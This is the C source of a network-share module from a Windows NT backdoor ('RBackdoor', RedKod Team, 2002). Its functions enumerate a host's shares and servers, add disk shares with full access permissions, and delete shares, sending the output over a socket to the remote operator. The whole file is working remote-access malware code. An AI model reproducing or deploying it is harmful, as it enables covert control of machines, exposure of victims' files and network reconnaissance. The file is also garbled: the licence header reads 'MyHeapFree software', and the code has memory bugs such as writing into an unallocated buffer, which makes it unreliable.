/*
______ ______               _         _
| ___ \| ___ \             | |       | |
| |_/ /| |_/ /  __ _   ___ | | __  __| |  ___    ___   _ __
|    / | ___ \ / _` | / __|| |/ / / _` | / _ \  / _ \ | '__|
| |\ \ | |_/ /| (_| || (__ |   < | (_| || (_) || (_) || |
\_| \_|\____/  \__,_| \___||_|\_\ \__,_| \___/  \___/ |_|

                      - Version 1.3 -
                                             RedKod Team
                                           www.redkod.com
Coder: R-e-D
Mail : r-e-d@redkod.com

Backdoor designed for NT System.
Copyright (C) 2002 R-e-D

This program is MyHeapFree software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the MyHeapFree Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License along
with this program; if not, write to the MyHeapFree Software Foundation, Inc.,
59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.

*/

#include "rbackdoor.h"

int RShare_Enum(const char *host)
{
	SHARE_INFO_2 *buf, *cur;
	unsigned long read, total, resumeh, rc, i;
	unsigned short *server = NULL;
	char *tempstr = NULL, *type = NULL, *buffer = NULL;
	static char *types[] = { "disk", "printq", "device", "ipc"  };
		
	if(!*host)
	{
		Proc_help("netshare");
		return(-1);
	}
	
	if (strlen(host) >= 1) {
		mbstowcs(server, host, 256);
	}
	else {
		server[0] = L'\0';
	}

	buffer = (char *)MyHeapAlloc(BUF_MAXLEN);
	tempstr = (char *)MyHeapAlloc(20 * sizeof(char));
	server = (unsigned short *)MyHeapAlloc(BUF_MAXLEN);
	
	resumeh = 0;
	do
	{
		buf = NULL;
		rc = NetShareEnum(strlen(host)>1?NULL: (unsigned char *)server, 2, (BYTE **) &buf,8192, &read, &total, &resumeh);
		
		sprintf(buffer, "=====================================\n => %lu Entrees sur %lu\n=====================================\n", read, total );
		rsend(ConnectSocket, buffer);		
		
		for (i = 0, cur = buf; i < read; ++i, ++cur)
		{
			if ((cur->shi2_type & ~STYPE_SPECIAL) >= 0 && (cur->shi2_type & ~STYPE_SPECIAL) <= STYPE_IPC)
				type = types[(cur->shi2_type & ~STYPE_SPECIAL)];
			else
				sprintf(type = tempstr, "%08lx", cur->shi2_type);
			sprintf(buffer, " > %-20.20S     %-8.8s%c     %-.100S\n", cur->shi2_netname, type, (cur->shi2_type & STYPE_SPECIAL)? '*': ' ',cur->shi2_path);
			rsend(ConnectSocket, buffer);
		}
		
		if (buf != NULL)
			NetApiBufferFree(buf);
		
	} while (rc == ERROR_MORE_DATA);
	
	MyHeapFree(buffer);
	MyHeapFree(tempstr);
	MyHeapFree(server);

	return(0);
}

char *AsWideString(const char *cszANSIstring)
{
	int nBufSize;
	WCHAR *wideString;

	if(cszANSIstring == NULL)
		return NULL;

	nBufSize = MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, cszANSIstring, -1, NULL, 0 );
	wideString = (WCHAR *)MyHeapAlloc(nBufSize +1);
	MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, cszANSIstring, -1, wideString, nBufSize);

	return (char*)(wideString);
}

int RShareAdd(const char *host, const char *dir_path, const char *net_name, const char *password)
{
	SHARE_INFO_2 *shareinfo;
	unsigned long dwErrArg;

	if(!*host || !*dir_path|| !*net_name)
	{
		Proc_help("addshare");
		return(-1);
	}	

	shareinfo = (SHARE_INFO_2 *)MyHeapAlloc(sizeof(SHARE_INFO_2));

    shareinfo->shi2_netname      = AsWideString(net_name);
    shareinfo->shi2_type         = STYPE_DISKTREE;
	shareinfo->shi2_remark	     = AsWideString("RSHARE");
	shareinfo->shi2_max_uses	 = (unsigned long)(-1);
	shareinfo->shi2_current_uses = 0;
	shareinfo->shi2_path		 = AsWideString(dir_path);
	shareinfo->shi2_permissions  = ACCESS_ALL;
	shareinfo->shi2_passwd       = AsWideString(password);	

	if(NetShareAdd(AsWideString(host), 2, (unsigned char *)shareinfo, &dwErrArg) == 0)
		DisplayMessage("Ressource partagee avec succes.", 1);
	else 
	{
		DisplayMessage("La ressource n'a pas ete partagee.", 0);
		MyHeapFree(shareinfo);
		return(-1);
	}
	
	MyHeapFree(shareinfo);
    
    return(0);
}

int RShareDel(const char *host, const char* net_name)
{
	char *wide_net_name = NULL;
	int nResult;

	if(!*host || !*net_name)
	{
		Proc_help("delshare");
		return(-1);
	}

	wide_net_name = AsWideString(net_name);
	nResult       = NetShareDel(AsWideString(host), wide_net_name, 0);

	
	if(NERR_Success == nResult)
		DisplayMessage("Ressource partagee efface avec succes.", 1);
	else 
	{
		DisplayMessage("Erreur lors de la tentative de suppression de la ressource.", 0);
		return(-1);
	}

	return(0);
}

int RServerEnum(const char *server)
{
   LPSERVER_INFO_101 pBuf = NULL;
   LPSERVER_INFO_101 pTmpBuf;
   NET_API_STATUS nStatus;
   LPTSTR pszServerName = NULL;
   unsigned long dwLevel = 101;
   unsigned long dwPrefMaxLen = 0xFFFFFFFF;
   unsigned long dwEntriesRead = 0;
   unsigned long dwTotalEntries = 0;
   unsigned long dwTotalCount = 0;
   unsigned long dwServerType = SV_TYPE_SERVER; // all servers
   unsigned long dwResumeHandle = 0;
   unsigned long i;
   char *buffer = NULL;

   if (!*server)
   {
      Proc_help("enumserver");
	  return -1;
   }

   pszServerName = AsWideString(server);
  
   nStatus = NetServerEnum((unsigned short *)pszServerName, dwLevel, (LPBYTE *) &pBuf, dwPrefMaxLen, &dwEntriesRead,&dwTotalEntries, dwServerType,NULL,&dwResumeHandle);

   buffer = (char *)MyHeapAlloc(BUF_MAXLEN); 

   if ((nStatus == NERR_Success) || (nStatus == ERROR_MORE_DATA))
   {
      if ((pTmpBuf = pBuf) != NULL)
      {
         for (i = 0; i < dwEntriesRead; i++)
         {
            assert(pTmpBuf != NULL);

            if (pTmpBuf == NULL)
            {
			   DisplayMessage("An access violation has occurred.", 0);
               break;
            }

            sprintf(buffer, "\tPlatform: %d\n", pTmpBuf->sv101_platform_id);
			sprintf(buffer, "%s\tName:     %s\n", buffer, pTmpBuf->sv101_name);
            sprintf(buffer, "%s\tVersion:  %d.%d\n", buffer, pTmpBuf->sv101_version_major, pTmpBuf->sv101_version_minor);
            sprintf(buffer, "%s\tType:     %d", buffer, pTmpBuf->sv101_type);
            rsend(ConnectSocket, buffer);

            if (pTmpBuf->sv101_type & SV_TYPE_DOMAIN_CTRL)
               rsend(ConnectSocket, " (PDC)");
			   
            else if (pTmpBuf->sv101_type & SV_TYPE_DOMAIN_BAKCTRL)
               rsend(ConnectSocket, " (BDC)");
            
            rsend(ConnectSocket, "\n");

            sprintf(buffer ,"\tComment:  %s\n\n", pTmpBuf->sv101_comment);
			rsend(ConnectSocket, buffer);

            pTmpBuf++;
            dwTotalCount++;
         }

         if (nStatus == ERROR_MORE_DATA)
         {
            rsend(ConnectSocket, "\nMore entries available!!!\n");
            sprintf(buffer, "Total entries: %d", dwTotalEntries);
			rsend(ConnectSocket, buffer);
         }
         sprintf(buffer, "\nEntries enumerated: %d\n", dwTotalCount);
		 rsend(ConnectSocket, buffer);
      }
   }
   else
      sprintf(buffer, "Error: A system error has occurred: %s\n", DisplayError());
      rsend(ConnectSocket, buffer);
   if (pBuf != NULL)
      NetApiBufferFree(pBuf);

   MyHeapFree(buffer);

   return(0);
}

